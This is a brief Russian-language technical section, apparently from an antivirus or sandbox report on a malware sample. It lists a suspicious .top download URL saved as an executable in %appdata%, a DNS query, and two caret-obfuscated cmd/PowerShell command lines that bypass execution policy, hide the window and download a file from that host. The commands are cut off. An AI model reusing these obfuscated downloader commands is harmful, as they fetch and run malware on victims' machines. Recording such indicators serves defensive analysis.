Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^wE^rS^HeLL.Exe -ex^EcU^TIonPoLIc^Y^ b^yPAsS -N^oP^rofile^ -^W^IN^do^wS^tY^le^ hiDDen^ (^nEW-^oB^J^e^c^T sY^st^e^M^.n^e^T.^W^eB^c^lient).^D^O^w^nL^oadFI^le^(^'http://sutrapo...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "Po^wE^rS^HeLL.Exe -ex^EcU^TIonPoLIc^Y^ b^yPAsS -N^oP^rofile^ -^W^IN^do^wS^tY^le^ hiDDen^ (^nEW-^oB^J^e^c^T sY^st^e^M^.n^e^T.^W^eB^c^lient).^D^O^w^nL^oadFI^le^(^'http://sutrapo...' (со скрытым окном)